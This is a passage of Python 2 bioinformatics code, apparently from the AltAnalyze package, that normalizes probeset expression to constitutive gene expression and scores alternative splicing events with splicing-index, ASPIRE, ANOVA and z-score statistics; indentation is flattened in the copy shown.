NI1,index1 = NI_list[k1]; NI2,index2 = NI_list_rev[k2]; abs_SI = abs(math.log(NI1/NI2,2))
if abs_SI<alt_exon_logfold_cutoff:
### Indicates that no valid matches were identified - hence, exit loop and return an NI_list with no variance
NI_list = [NI_list[0],NI_list[0]]
else:
### Indicates that no valid matches were identified - hence, exit loop and return an NI_list with no variance
constit_exp1 = original_avg_const_exp_db[geneid][index1]
constit_exp2 = original_avg_const_exp_db[geneid][index2]
ge_fold = constit_exp2-constit_exp1
#print 'original',abs_SI,k1,k2, ge_fold, constit_exp1, constit_exp2
if abs(ge_fold) < log_fold_cutoff: filtered_NI_comps.append([abs_SI,k1,k2])
else:
for i1 in NI_list:
k2=0
for i2 in NI_list_rev:
NI1,index1 = i1; NI2,index2 = i2; abs_SI = abs(math.log(NI1/NI2,2))
#constit_exp1 = original_avg_const_exp_db[geneid][index1]
#constit_exp2 = original_avg_const_exp_db[geneid][index2]
#ge_fold = constit_exp2-constit_exp1
#if abs(ge_fold) < log_fold_cutoff: filtered_NI_comps.append([abs_SI,k1,k2])
#print k1,k2, i1, i2, abs_SI, abs(ge_fold), log_fold_cutoff, alt_exon_logfold_cutoff
if abs_SI<alt_exon_logfold_cutoff: break
else:
constit_exp1 = original_avg_const_exp_db[geneid][index1]
constit_exp2 = original_avg_const_exp_db[geneid][index2]
ge_fold = constit_exp2-constit_exp1
if abs(ge_fold) < log_fold_cutoff:
filtered_NI_comps.append([abs_SI,k1,k2])
#if k1 == 49 or k1 == 50 or k1 == 51: print probeset, abs_SI, k1, k2, abs(ge_fold),log_fold_cutoff, index1, index2, NI1, NI2, constit_exp1,constit_exp2
k2+=1
k1+=1
if len(filtered_NI_comps)>0:
#print filtered_NI_comps
#print NI_list_rev
#print probeset,geneid
#print len(filtered_NI_comps)
#print original_avg_const_exp_db[geneid]
filtered_NI_comps.sort()
si,k1,k2 = filtered_NI_comps[-1]
NI_list = [NI_list[k1],NI_list_rev[k2]]
"""
NI1,index1 = NI_list[0]; NI2,index2 = NI_list[-1]
constit_exp1 = original_avg_const_exp_db[geneid][index1]
constit_exp2 = original_avg_const_exp_db[geneid][index2]
ge_fold = constit_exp2-constit_exp1
print probeset, si, ge_fold, NI_list"""
#print k1,k2;sys.exit()
index1 = NI_list[0][1]; index2 = NI_list[-1][1]
nonlog_NI_db[probeset] = [NI_list[0][0],NI_list[-1][0]] ### Update the values of this dictionary
data_list1 = array_raw_group_values[probeset][index1]; data_list2 = array_raw_group_values[probeset][index2]
avg1 = statistics.avg(data_list1); avg2 = statistics.avg(data_list2); log_fold = avg2 - avg1
group_name1 = array_group_list[index1]; group_name2 = array_group_list[index2]
try:
#t,df,tails = statistics.ttest(data_list1,data_list2,2,3) #unpaired student ttest, calls p_value function
#t = abs(t); df = round(df); ttest_exp_p = statistics.t_probability(t,df)
ttest_exp_p = statistics.runComparisonStatistic(data_list1,data_list2,probability_statistic)
except Exception: ttest_exp_p = 1
fold_dbase[probeset] = [0]; fold_dbase[probeset].append(log_fold)
if ttest_exp_p == -1: del fold_dbase[probeset]; probesets_to_delete.append(probeset); x += 1
elif avg1 < expression_threshold and avg2 < expression_threshold and (ttest_exp_p > p_threshold and ttest_exp_p != 1): ### Inserted a filtering option to exclude small variance, low expreession probesets
del fold_dbase[probeset]; probesets_to_delete.append(probeset); x += 1
else:
constit_exp1 = original_avg_const_exp_db[geneid][index1]
constit_exp2 = original_avg_const_exp_db[geneid][index2]
ge_fold = constit_exp2-constit_exp1
normInt1 = (avg1-constit_exp1); normInt2 = (avg2-constit_exp2)
adj_fold = normInt2 - normInt1
splicing_index = -1*adj_fold; abs_splicing_index = abs(splicing_index)
#print probeset, splicing_index, ge_fold, index1, index2
#normIntList1 = adj_exp_lists[index1]; normIntList2 = adj_exp_lists[index2]
all_nI=[]
for g_index in adj_exp_lists: all_nI.append(adj_exp_lists[g_index])
try: normIntensityP = statistics.OneWayANOVA(all_nI) #[normIntList1,normIntList2] ### This stays an ANOVA independent of the algorithm choosen since groups number > 2
except Exception: normIntensityP = 'NA'
if (normInt1*normInt2)<0: opposite_SI_log_mean = 'yes'
else: opposite_SI_log_mean = 'no'
abs_log_ratio = abs(ge_fold)
if probeset in midas_db:
try: midas_p = float(midas_db[probeset])
except ValueError: midas_p = 'NA'
else: midas_p = 'NA'
#if 'ENSG00000059588' in geneid: print probeset, splicing_index, constit_exp1, constit_exp2, ge_fold,group_name2+'_vs_'+group_name1, index1, index2
if abs_splicing_index>alt_exon_logfold_cutoff and (midas_p < p_threshold or midas_p == 'NA'): #and abs_log_ratio>1 and ttest_exp_p<0.05: ###and ge_threshold_count==2
exonid = ed.ExonID(); critical_exon_list = [1,[exonid]]
ped = ProbesetExpressionData(avg1, avg2, log_fold, adj_fold, ttest_exp_p, group_name2+'_vs_'+group_name1)
sid = ExonData(splicing_index,probeset,critical_exon_list,geneid,normInt1,normInt2,normIntensityP,opposite_SI_log_mean)
sid.setConstitutiveExpression(constit_exp1); sid.setConstitutiveFold(ge_fold); sid.setProbesetExpressionData(ped)
si_db.append((splicing_index,sid))
else:
### Also record the data for probesets that are excluded... Used by DomainGraph
eed = ExcludedExonData(splicing_index,geneid,normIntensityP)
ex_db[probeset] = eed
if array_type == 'RNASeq': id_name = 'exon/junction IDs'
else: id_name = 'array IDs'
print len(si_db),id_name,"with evidence of Alternative expression"
original_fold_dbase = fold_dbase; si_db.sort()
summary_data_db['denominator_exp_events']=len(nonlog_NI_db)
del avg_const_exp_db; del gene_db; del constitutive_gene_db; gene_expression_diff_db={}
if export_NI_values == 'yes': adjoutput.close()
### Above, all conditions were examined when more than 2 are present... change this so that only the most extreeem are analyzed further
elif len(array_group_list)>2 and (array_type == 'junction' or array_type == 'RNASeq' or array_type == 'AltMouse'): ### USED FOR MULTIPLE COMPARISONS
excluded_probeset_db={}
group_sizes = []; original_array_indices = permute_lists[0] ###p[0] is the original organization of the group samples prior to permutation
for group in original_array_indices: group_sizes.append(len(group))
if analysis_method == 'linearregres': ### For linear regression, these scores are non-long
original_array_raw_group_values = copy.deepcopy(array_raw_group_values)
for probeset in array_raw_group_values:
ls_concatenated=[]
for group in array_raw_group_values[probeset]: ls_concatenated+=group
ls_concatenated = statistics.log_fold_conversion_fraction(ls_concatenated)
array_raw_group_values[probeset] = ls_concatenated
pos1=0; pos2=0; positions=[]
for group in group_sizes:
if pos1 == 0: pos2 = group; positions.append((pos1,pos2))
else: pos2 = pos1+group; positions.append((pos1,pos2))
pos1 = pos2
if export_NI_values == 'yes':
export_exon_regions = 'yes'
### Currently, we don't deal with raw adjusted expression values, just group, so just export the values for each group
summary_output = root_dir+'AltResults/RawSpliceData/'+species+'/'+analysis_method+'/'+dataset_name[:-1]+'.txt'
print "Exporting all normalized intensities to:\n"+summary_output
adjoutput = export.ExportFile(summary_output)
title = string.join(['gene\tprobesets\tExonRegion']+original_array_names,'\t')+'\n'; adjoutput.write(title)
events_examined= 0; denominator_events=0; fold_dbase=[]; adj_fold_dbase=[]; scores_examined=0
splice_event_list=[]; splice_event_list_mx=[]; splice_event_list_non_mx=[]; event_mx_temp = []; permute_p_values={}; probeset_comp_db={}#use this to exclude duplicate mx events
for geneid in alt_junction_db:
affygene = geneid
for event in alt_junction_db[geneid]:
if array_type == 'AltMouse':
#event = [('ei', 'E16-E17'), ('ex', 'E16-E18')]
#critical_exon_db[affygene,tuple(critical_exons)] = [1,'E'+str(e1a),'E'+str(e2b)] --- affygene,tuple(event) == key, 1 indicates both are either up or down together
event_call = event[0][0] + '-' + event[1][0]
exon_set1 = event[0][1]; exon_set2 = event[1][1]
probeset1 = exon_dbase[affygene,exon_set1]
probeset2 = exon_dbase[affygene,exon_set2]
critical_exon_list = critical_exon_db[affygene,tuple(event)]
if array_type == 'junction' or array_type == 'RNASeq':
event_call = 'ei-ex' ### Below objects from JunctionArrayEnsemblRules - class JunctionInformation
probeset1 = event.InclusionProbeset(); probeset2 = event.ExclusionProbeset()
exon_set1 = event.InclusionJunction(); exon_set2 = event.ExclusionJunction()
try: novel_event = event.NovelEvent()
except Exception: novel_event = 'known'
critical_exon_list = [1,event.CriticalExonSets()]
key,jd = formatJunctionData([probeset1,probeset2],geneid,critical_exon_list[1])
if array_type == 'junction' or array_type == 'RNASeq':
try: jd.setSymbol(annotate_db[geneid].Symbol())
except Exception: null=[]
#if '|' in probeset1: print probeset1, key,jd.InclusionDisplay();kill
probeset_comp_db[key] = jd ### This is used for the permutation analysis and domain/mirBS import
dI_scores=[]
if probeset1 in nonlog_NI_db and probeset2 in nonlog_NI_db and probeset1 in array_raw_group_values and probeset2 in array_raw_group_values:
events_examined+=1
if analysis_method == 'ASPIRE':
index1=0; NI_list1=[]; NI_list2=[] ### Add the group_name to each adj fold value
for NI in nonlog_NI_db[probeset1]: NI_list1.append(NI)
for NI in nonlog_NI_db[probeset2]: NI_list2.append(NI)
for NI1_g1 in NI_list1:
NI2_g1 = NI_list2[index1]; index2=0
for NI1_g2 in NI_list1:
try: NI2_g2 = NI_list2[index2]
except Exception: print index1, index2, NI_list1, NI_list2;kill
if index1 != index2:
b1 = NI1_g1; e1 = NI1_g2
b2 = NI2_g1; e2 = NI2_g2
try:
dI = statistics.aspire_stringent(b1,e1,b2,e2); Rin = b1/e1; Rex = b2/e2
if (Rin>1 and Rex<1) or (Rin<1 and Rex>1):
if dI<0: i1,i2 = index2,index1 ### all scores should indicate upregulation
else: i1,i2=index1,index2
dI_scores.append((abs(dI),i1,i2))
except Exception:
#if array_type != 'RNASeq': ### RNASeq has counts of zero and one that can cause the same result between groups and probesets
#print probeset1, probeset2, b1, e1, b2, e2, index1, index2, events_examined;kill
### Exception - Occurs for RNA-Seq but can occur for array data under extreemly rare circumstances (Rex=Rin even when different b1,e1 and b2,ed values)
null=[]
index2+=1
index1+=1
dI_scores.sort()
if analysis_method == 'linearregres':
log_fold,i1,i2 = getAllPossibleLinearRegressionScores(probeset1,probeset2,positions,group_sizes)
dI_scores.append((log_fold,i1,i2))
raw_exp_vals1 = original_array_raw_group_values[probeset1]; raw_exp_vals2 = original_array_raw_group_values[probeset2]
else: raw_exp_vals1 = array_raw_group_values[probeset1]; raw_exp_vals2 = array_raw_group_values[probeset2]
adj_exp_lists1={}; adj_exp_lists2={} ### Store the adjusted expression values for each group
if geneid in avg_const_exp_db:
gi=0; l=0; adj_exp_vals = []; anova_test=[]
for exp_list in raw_exp_vals1:
k=0; anova_group=[]
for exp in exp_list:
adj_exp_val1 = exp-avg_const_exp_db[geneid][l]
try: adj_exp_lists1[gi].append(adj_exp_val1)
except Exception: adj_exp_lists1[gi] = [adj_exp_val1]
adj_exp_val2 = raw_exp_vals2[gi][k]-avg_const_exp_db[geneid][l]
try: adj_exp_lists2[gi].append(adj_exp_val2)
except Exception: adj_exp_lists2[gi] = [adj_exp_val2]
anova_group.append(adj_exp_val2-adj_exp_val1)
if export_NI_values == 'yes':
#if analysis_method == 'ASPIRE':
adj_exp_vals.append(str(adj_exp_val2-adj_exp_val1))
### BELOW CODE PRODUCES THE SAME RESULT!!!!
"""folds1 = statistics.log_fold_conversion_fraction([exp])
folds2 = statistics.log_fold_conversion_fraction([raw_exp_vals2[gi][k]])
lr_score = statistics.convert_to_log_fold(statistics.simpleLinRegress(folds1,folds2))
adj_exp_vals.append(str(lr_score))"""
k+=1; l+=0
gi+=1; anova_test.append(anova_group)
if export_NI_values == 'yes':
if export_exon_regions == 'yes':
exon_regions = string.join(critical_exon_list[1],'|')
exon_regions = string.split(exon_regions,'|')
for er in exon_regions:
ev = string.join([geneid+'\t'+probeset1+'-'+probeset2+'\t'+er]+adj_exp_vals,'\t')+'\n'
if len(filtered_probeset_db)>0:
if probeset1 in filtered_probeset_db and probeset2 in filtered_probeset_db:
adjoutput.write(ev) ### This is used when we want to restrict to only probesets known to already by changed
else: adjoutput.write(ev)
try: anovaNIp = statistics.OneWayANOVA(anova_test) ### This stays an ANOVA independent of the algorithm choosen since groups number > 2
except Exception: anovaNIp='NA'
if len(dI_scores)>0 and geneid in avg_const_exp_db:
dI,index1,index2 = dI_scores[-1]; count=0
probesets = [probeset1, probeset2]; index=0
key,jd = formatJunctionData([probeset1,probeset2],affygene,critical_exon_list[1])
if array_type == 'junction' or array_type == 'RNASeq':
try: jd.setSymbol(annotate_db[affygene].Symbol())
except Exception:null=[]
probeset_comp_db[key] = jd ### This is used for the permutation analysis and domain/mirBS import
if max_replicates >2 or equal_replicates==2: permute_p_values[(probeset1,probeset2)] = [anovaNIp, 'NA', 'NA', 'NA']
index=0
for probeset in probesets:
if analysis_method == 'linearregres':
data_list1 = original_array_raw_group_values[probeset][index1]; data_list2 = original_array_raw_group_values[probeset][index2]
else: data_list1 = array_raw_group_values[probeset][index1]; data_list2 = array_raw_group_values[probeset][index2]
baseline_exp = statistics.avg(data_list1); experimental_exp = statistics.avg(data_list2); fold_change = experimental_exp - baseline_exp
group_name1 = array_group_list[index1]; group_name2 = array_group_list[index2]
try:
ttest_exp_p = statistics.runComparisonStatistic(data_list1,data_list2,probability_statistic)
except Exception: ttest_exp_p = 'NA'
if ttest_exp_p==1: ttest_exp_p = 'NA'
if index == 0:
try: adj_fold = statistics.avg(adj_exp_lists1[index2]) - statistics.avg(adj_exp_lists1[index1])
except Exception:
print raw_exp_vals1,raw_exp_vals2, avg_const_exp_db[geneid]
print probeset,probesets,adj_exp_lists1,adj_exp_lists2,index1,index2;kill
ped1 = ProbesetExpressionData(baseline_exp, experimental_exp, fold_change, adj_fold, ttest_exp_p, group_name2+'_vs_'+group_name1)
else:
adj_fold = statistics.avg(adj_exp_lists2[index2]) - statistics.avg(adj_exp_lists2[index1])
ped2 = ProbesetExpressionData(baseline_exp, experimental_exp, fold_change, adj_fold, ttest_exp_p, group_name2+'_vs_'+group_name1)
constit_exp1 = original_avg_const_exp_db[geneid][index1]
constit_exp2 = original_avg_const_exp_db[geneid][index2]
ge_fold = constit_exp2-constit_exp1
index+=1
try:
pp1 = statistics.runComparisonStatistic(adj_exp_lists1[index1], adj_exp_lists1[index2],probability_statistic)
pp2 = statistics.runComparisonStatistic(adj_exp_lists2[index1], adj_exp_lists2[index2],probability_statistic)
except Exception: pp1 = 'NA'; pp2 = 'NA'
if analysis_method == 'ASPIRE' and len(dI_scores)>0:
p1 = JunctionExpressionData(adj_exp_lists1[index1], adj_exp_lists1[index2], pp1, ped1)
p2 = JunctionExpressionData(adj_exp_lists2[index1], adj_exp_lists2[index2], pp2, ped2)
### ANOVA p-replaces the below p-value
"""try: baseline_scores, exp_scores, pairwiseNIp = calculateAllASPIREScores(p1,p2)
except Exception: baseline_scores = [0]; exp_scores=[dI]; pairwiseNIp = 0 """
#if pairwiseNIp == 'NA': pairwiseNIp = 0 ### probably comment out
if len(dI_scores)>0:
scores_examined+=1
if probeset in midas_db:
try: midas_p = float(midas_db[probeset])
except ValueError: midas_p = 'NA'
else: midas_p = 'NA'
if dI>alt_exon_logfold_cutoff and (anovaNIp < p_threshold or perform_permutation_analysis == 'yes' or anovaNIp == 'NA' or anovaNIp == 1): #and abs_log_ratio>1 and ttest_exp_p<0.05: ###and ge_threshold_count==2
#print [dI, probeset1,probeset2, anovaNIp, alt_exon_logfold_cutoff];kill
ejd = ExonJunctionData(dI,probeset1,probeset2,pp1,pp2,'upregulated',event_call,critical_exon_list,affygene,ped1,ped2)
ejd.setConstitutiveFold(ge_fold); ejd.setConstitutiveExpression(constit_exp1)
if array_type == 'RNASeq':
ejd.setNovelEvent(novel_event)
splice_event_list.append((dI,ejd))
else: excluded_probeset_db[affygene+':'+critical_exon_list[1][0]] = probeset1, affygene, dI, 'NA', anovaNIp
statistics.adjustPermuteStats(permute_p_values)
ex_db = splice_event_list, probeset_comp_db, permute_p_values, excluded_probeset_db
original_fold_dbase = fold_dbase; original_avg_const_exp_db=[]; nonlog_NI_db = []; fold_dbase=[]
summary_data_db['denominator_exp_events']=events_examined
del avg_const_exp_db; del gene_db; del constitutive_gene_db; gene_expression_diff_db={}
if export_NI_values == 'yes': adjoutput.close()
print len(splice_event_list), 'alternative exons out of %s exon events examined' % events_examined
fold_dbase=[]; original_fold_dbase=[]; exon_db=[]; constitutive_gene_db=[]; addback_genedb=[]
gene_db=[]; missing_genedb=[]
"""
print 'local vars'
all = [var for var in locals() if (var[:2], var[-2:]) != ("__", "__")]
for var in all:
try:
if len(locals()[var])>500: print var, len(locals()[var])
except Exception: null=[]
"""
return conditions,adj_fold_dbase,nonlog_NI_db,dataset_name,gene_expression_diff_db,midas_db,ex_db,si_db
class ProbesetExpressionData:
def __init__(self, baseline_exp, experimental_exp, fold_change, adj_fold, ttest_raw_exp, annotation):
self.baseline_exp = baseline_exp; self.experimental_exp = experimental_exp
self.fold_change = fold_change; self.adj_fold = adj_fold
self.ttest_raw_exp = ttest_raw_exp; self.annotation = annotation
def BaselineExp(self): return str(self.baseline_exp)
def ExperimentalExp(self): return str(self.experimental_exp)
def FoldChange(self): return str(self.fold_change)
def AdjFold(self): return str(self.adj_fold)
def ExpPval(self): return str(self.ttest_raw_exp)
def Annotation(self): return self.annotation
def __repr__(self): return self.BaselineExp()+'|'+FoldChange()
def agglomerateInclusionProbesets(array_raw_group_values,exon_inclusion_db):
###Combine expression profiles for inclusion probesets that correspond to the same splice event
for excl_probeset in exon_inclusion_db:
inclusion_event_profiles = []
if len(exon_inclusion_db[excl_probeset])>1:
for incl_probeset in exon_inclusion_db[excl_probeset]:
if incl_probeset in array_raw_group_values and excl_probeset in array_raw_group_values:
array_group_values = array_raw_group_values[incl_probeset]
inclusion_event_profiles.append(array_group_values)
#del array_raw_group_values[incl_probeset] ###Remove un-agglomerated original entry
if len(inclusion_event_profiles) > 0: ###Thus, some probesets for this splice event in input file
combined_event_profile = combine_profiles(inclusion_event_profiles)
###Combine inclusion probesets into a single ID (identical manner to that in ExonAnnotate_module.identifyPutativeSpliceEvents
incl_probesets = exon_inclusion_db[excl_probeset]
incl_probesets_str = string.join(incl_probesets,'|')
array_raw_group_values[incl_probesets_str] = combined_event_profile
return array_raw_group_values
def combine_profiles(profile_list):
profile_group_sizes={}
for db in profile_list:
for key in db: profile_group_sizes[key] = len(db[key])
break
new_profile_db={}
for key in profile_group_sizes:
x = profile_group_sizes[key] ###number of elements in list for key
new_val_list=[]; i = 0
while i<x:
temp_val_list=[]
for db in profile_list:
if key in db: val = db[key][i]; temp_val_list.append(val)
i+=1; val_avg = statistics.avg(temp_val_list); new_val_list.append(val_avg)
new_profile_db[key] = new_val_list
return new_profile_db
def constitutive_exp_normalization(fold_db,stats_dbase,exon_db,constitutive_probeset_db):
"""For every expression value, normalize to the expression of the constitutive gene features for that condition,
then store those ratios (probeset_exp/avg_constitutive_exp) and regenerate expression values relative only to the
baseline avg_constitutive_exp, for all conditions, to normalize out gene expression changes"""
#print "\nParameters:"
#print "Factor_out_expression_changes:",factor_out_expression_changes
#print "Only_include_constitutive_containing_genes:",only_include_constitutive_containing_genes
#print "\nAdjusting probeset average intensity values to factor out condition specific expression changes for optimal splicing descrimination"
gene_db = {}; constitutive_gene_db = {}
### organize everything by gene
for probeset in fold_db: conditions = len(fold_db[probeset]); break
remove_diff_exp_genes = remove_transcriptional_regulated_genes
if conditions > 2: remove_diff_exp_genes = 'no'
for probeset in exon_db:
affygene = exon_db[probeset].GeneID() #exon_db[probeset] = affygene,exons,ensembl,block_exon_ids,block_structure,comparison_info
if probeset in fold_db:
try: gene_db[affygene].append(probeset)
except KeyError: gene_db[affygene] = [probeset]
if probeset in constitutive_probeset_db and (only_include_constitutive_containing_genes == 'yes' or factor_out_expression_changes == 'no'):
#the second conditional is used to exlcude constitutive data if we wish to use all probesets for
#background normalization rather than just the designated 'gene' probesets.
if probeset in stats_dbase:
try: constitutive_gene_db[affygene].append(probeset)
except KeyError: constitutive_gene_db[affygene] = [probeset]
if len(constitutive_gene_db)>0:
###This is blank when there are no constitutive and the above condition is implemented
gene_db2 = constitutive_gene_db
else: gene_db2 = gene_db
avg_const_exp_db = {}
for affygene in gene_db2:
probeset_list = gene_db2[affygene]
x = 0
while x < conditions:
### average all exp values for constitutive probesets for each condition
exp_list=[]
for probeset in probeset_list:
probe_fold_val = fold_db[probeset][x]
baseline_exp = stats_dbase[probeset][0]
exp_val = probe_fold_val + baseline_exp
exp_list.append(exp_val)
avg_const_exp = statistics.avg(exp_list)
try: avg_const_exp_db[affygene].append(avg_const_exp)
except KeyError: avg_const_exp_db[affygene] = [avg_const_exp]
x += 1
adj_fold_dbase={}; nonlog_NI_db={}; constitutive_fold_change={}
for affygene in avg_const_exp_db: ###If we only wish to include propper constitutive probes, this will ensure we only examine those genes and probesets that are constitutive
probeset_list = gene_db[affygene]
x = 0
while x < conditions:
exp_list=[]
for probeset in probeset_list:
expr_to_subtract = avg_const_exp_db[affygene][x]
baseline_const_exp = avg_const_exp_db[affygene][0]
probe_fold_val = fold_db[probeset][x]
baseline_exp = stats_dbase[probeset][0]
exp_val = probe_fold_val + baseline_exp
exp_val_non_log = statistics.log_fold_conversion_fraction(exp_val)
expr_to_subtract_non_log = statistics.log_fold_conversion_fraction(expr_to_subtract)
baseline_const_exp_non_log = statistics.log_fold_conversion_fraction(baseline_const_exp)
if factor_out_expression_changes == 'yes':
exp_splice_valff = exp_val_non_log/expr_to_subtract_non_log
else: #if no, then we just normalize to the baseline constitutive expression in order to keep gene expression effects (useful if you don't trust constitutive feature expression levels)
exp_splice_valff = exp_val_non_log/baseline_const_exp_non_log
constitutive_fold_diff = expr_to_subtract_non_log/baseline_const_exp_non_log
###To calculate adjusted expression, we need to get the fold change in the constitutive avg (expr_to_subtract/baseline_const_exp) and divide the experimental expression
###By this fold change.
ge_adj_exp_non_log = exp_val_non_log/constitutive_fold_diff #gives a GE adjusted expression
try: ge_adj_exp = math.log(ge_adj_exp_non_log,2)
except ValueError: print probeset,ge_adj_exp_non_log,constitutive_fold_diff,exp_val_non_log,exp_val,baseline_exp, probe_fold_val, dog
adj_probe_fold_val = ge_adj_exp - baseline_exp
### Here we normalize probeset expression to avg-constitutive expression by dividing probe signal by avg const.prove sig (should be < 1)
### refered to as steady-state normalization
if array_type != 'AltMouse' or (probeset not in constitutive_probeset_db):
"""Can't use constitutive gene features since these have no variance for pearson analysis
Python will approximate numbers to a small decimal point range. If the first fold value is
zero, often, zero will be close to but not exactly zero. Correct below """
try:
adj_fold_dbase[probeset].append(adj_probe_fold_val)
except KeyError:
if abs(adj_probe_fold_val - 0) < 0.0000001: #make zero == exactly to zero
adj_probe_fold_val = 0
adj_fold_dbase[probeset] = [adj_probe_fold_val]
try: nonlog_NI_db[probeset].append(exp_splice_valff) ###ratio of junction exp relative to gene expression at that time-point
except KeyError: nonlog_NI_db[probeset] = [exp_splice_valff]
n = 0
#if expr_to_subtract_non_log != baseline_const_exp_non_log: ###otherwise this is the first value in the expression array
if x!=0: ###previous expression can produce errors when multiple group averages have identical values
fold_change = expr_to_subtract_non_log/baseline_const_exp_non_log
fold_change_log = math.log(fold_change,2)
constitutive_fold_change[affygene] = fold_change_log
### If we want to remove any genes from the analysis with large transcriptional changes
### that may lead to false positive splicing calls (different probeset kinetics)
if remove_diff_exp_genes == 'yes':
if abs(fold_change_log) > log_fold_cutoff:
del constitutive_fold_change[affygene]
try: del adj_fold_dbase[probeset]
except KeyError: n = 1
try: del nonlog_NI_db[probeset]
except KeyError: n = 1
"""elif expr_to_subtract_non_log == baseline_const_exp_non_log: ###This doesn't make sense, since n can't equal 1 if the conditional is false (check this code again later 11/23/07)
if n == 1:
del adj_fold_dbase[probeset]
del nonlog_NI_db[probeset]"""
x += 1
print "Intensity normalization complete..."
if factor_out_expression_changes == 'no':
adj_fold_dbase = fold_db #don't change expression values
print len(constitutive_fold_change), "genes undergoing analysis for alternative splicing/transcription"
summary_data_db['denominator_exp_genes']=len(constitutive_fold_change)
"""
mir_gene_count = 0
for gene in constitutive_fold_change:
if gene in gene_microRNA_denom: mir_gene_count+=1
print mir_gene_count, "Genes with predicted microRNA binding sites undergoing analysis for alternative splicing/transcription"
"""
global gene_analyzed; gene_analyzed = len(constitutive_gene_db)
return adj_fold_dbase, nonlog_NI_db, conditions, gene_db, constitutive_gene_db,constitutive_fold_change, avg_const_exp_db
class TranscriptionData:
def __init__(self, constitutive_fold, rna_processing_annotation):
self._constitutive_fold = constitutive_fold; self._rna_processing_annotation = rna_processing_annotation
def ConstitutiveFold(self): return self._constitutive_fold
def ConstitutiveFoldStr(self): return str(self._constitutive_fold)
def RNAProcessing(self): return self._rna_processing_annotation
def __repr__(self): return self.ConstitutiveFoldStr()+'|'+RNAProcessing()
def constitutive_expression_changes(constitutive_fold_change,annotate_db):
###Add in constitutive fold change filter to assess gene expression for ASPIRE
gene_expression_diff_db = {}
for affygene in constitutive_fold_change:
constitutive_fold = constitutive_fold_change[affygene]; rna_processing_annotation=''
if affygene in annotate_db:
if len(annotate_db[affygene].RNAProcessing()) > 4: rna_processing_annotation = annotate_db[affygene].RNAProcessing()
###Add in evaluation of RNA-processing/binding factor
td = TranscriptionData(constitutive_fold,rna_processing_annotation)
gene_expression_diff_db[affygene] = td
return gene_expression_diff_db
def constitutive_exp_normalization_raw(gene_db,constitutive_gene_db,array_raw_group_values,exon_db,y,avg_const_exp_db):
"""normalize expression for raw expression data (only for non-baseline data)"""
#avg_true_const_exp_db[affygene] = [avg_const_exp]
temp_avg_const_exp_db={}
for probeset in array_raw_group_values:
conditions = len(array_raw_group_values[probeset][y]); break #number of raw expresson values to normalize
for affygene in gene_db:
###This is blank when there are no constitutive or the above condition is implemented
if affygene in constitutive_gene_db:
probeset_list = constitutive_gene_db[affygene]
z = 1
else: ###so we can analyze splicing independent of gene expression even if no 'gene' feature is present
probeset_list = gene_db[affygene]
z = 0
x = 0
while x < conditions:
### average all exp values for constitutive probesets for each conditionF
exp_list=[]
for probeset in probeset_list:
try: exp_val = array_raw_group_values[probeset][y][x] ### try statement is used for constitutive probes that were deleted due to filtering in performExpressionAnalysis
except KeyError: continue
exp_list.append(exp_val)
try: avg_const_exp = statistics.avg(exp_list)
except Exception: avg_const_exp = 'null'
if only_include_constitutive_containing_genes == 'yes' and avg_const_exp != 'null':
if z == 1:
try: avg_const_exp_db[affygene].append(avg_const_exp)
except KeyError: avg_const_exp_db[affygene] = [avg_const_exp]
try: temp_avg_const_exp_db[affygene].append(avg_const_exp)
except KeyError: temp_avg_const_exp_db[affygene] = [avg_const_exp]
elif avg_const_exp != 'null': ###***
try: avg_const_exp_db[affygene].append(avg_const_exp)
except KeyError: avg_const_exp_db[affygene] = [avg_const_exp]
try: temp_avg_const_exp_db[affygene].append(avg_const_exp)
except KeyError: temp_avg_const_exp_db[affygene] = [avg_const_exp]
x += 1
if analysis_method == 'ANOVA':
global normalized_raw_exp_ratios; normalized_raw_exp_ratios = {}
for affygene in gene_db:
probeset_list = gene_db[affygene]
for probeset in probeset_list:
while x < group_size:
new_ratios = [] ### Calculate expression ratios relative to constitutive expression
exp_val = array_raw_group_values[probeset][y][x]
const_exp_val = temp_avg_const_exp_db[affygene][x]
###Since the above dictionary is agglomerating all constitutive expression values for permutation,
###we need an unbiased way to grab just those relevant const. exp. vals. (hence the temp dictionary)
#non_log_exp_val = statistics.log_fold_conversion_fraction(exp_val)
#non_log_const_exp_val = statistics.log_fold_conversion_fraction(const_exp_val)
#non_log_exp_ratio = non_log_exp_val/non_log_const_exp_val
log_exp_ratio = exp_val - const_exp_val
try: normalized_raw_exp_ratios[probeset].append(log_exp_ratio)
except KeyError: normalized_raw_exp_ratios[probeset] = [log_exp_ratio]
return avg_const_exp_db
######### Z Score Analyses #######
class ZScoreData:
def __init__(self,element,changed,measured,zscore,null_z,gene_symbols):
self._element = element; self._changed = changed; self._measured = measured
self._zscore = zscore; self._null_z = null_z; self._gene_symbols = gene_symbols
def ElementID(self): return self._element
def Changed(self): return str(self._changed)
def Measured(self): return str(self._measured)
def AssociatedWithElement(self): return str(self._gene_symbols)
def ZScore(self): return str(self._zscore)
def SetP(self,p): self._permute_p = p
def PermuteP(self): return str(self._permute_p)
def SetAdjP(self,adjp): self._adj_p = adjp
def AdjP(self): return str(self._adj_p)
def PercentChanged(self):
try: pc = float(self.Changed())/float(self.Measured())*100
except Exception: pc = 0
return str(pc)
def NullZ(self): return self._null_z
def Report(self):
output = self.ElementID()
return output
def __repr__(self): return self.Report()
class FDRStats(ZScoreData):
def __init__(self,p): self._permute_p = p
def AdjP(self): return str(self._adj_p)
def countGenesForElement(permute_input_list,probeset_to_gene,probeset_element_db):
element_gene_db={}
for probeset in permute_input_list:
try:
element_list = probeset_element_db[probeset]
gene = probeset_to_gene[probeset]
for element in element_list:
try: element_gene_db[element].append(gene)
except KeyError: element_gene_db[element] = [gene]
except KeyError: null=[]
### Count the number of unique genes per element
for element in element_gene_db:
t = {}
for i in element_gene_db[element]: t[i]=[]
element_gene_db[element] = len(t)
return element_gene_db
def formatGeneSymbolHits(geneid_list):
symbol_list=[]
for geneid in geneid_list:
symbol = ''
if geneid in annotate_db: symbol = annotate_db[geneid].Symbol()
if len(symbol)<1: symbol = geneid
symbol_list.append(symbol)
symbol_str = string.join(symbol_list,', ')
return symbol_str
def zscore(r,n,N,R):
z = (r - n*(R/N))/math.sqrt(n*(R/N)*(1-(R/N))*(1-((n-1)/(N-1)))) #z = statistics.zscore(r,n,N,R)
return z
def calculateZScores(hit_count_db,denom_count_db,total_gene_denom_count,total_gene_hit_count,element_type):
N = float(total_gene_denom_count) ###Genes examined
R = float(total_gene_hit_count) ###AS genes
for element in denom_count_db:
element_denom_gene_count = denom_count_db[element]
n = float(element_denom_gene_count) ###all genes associated with element
if element in hit_count_db:
element_hit_gene_count = len(hit_count_db[element])
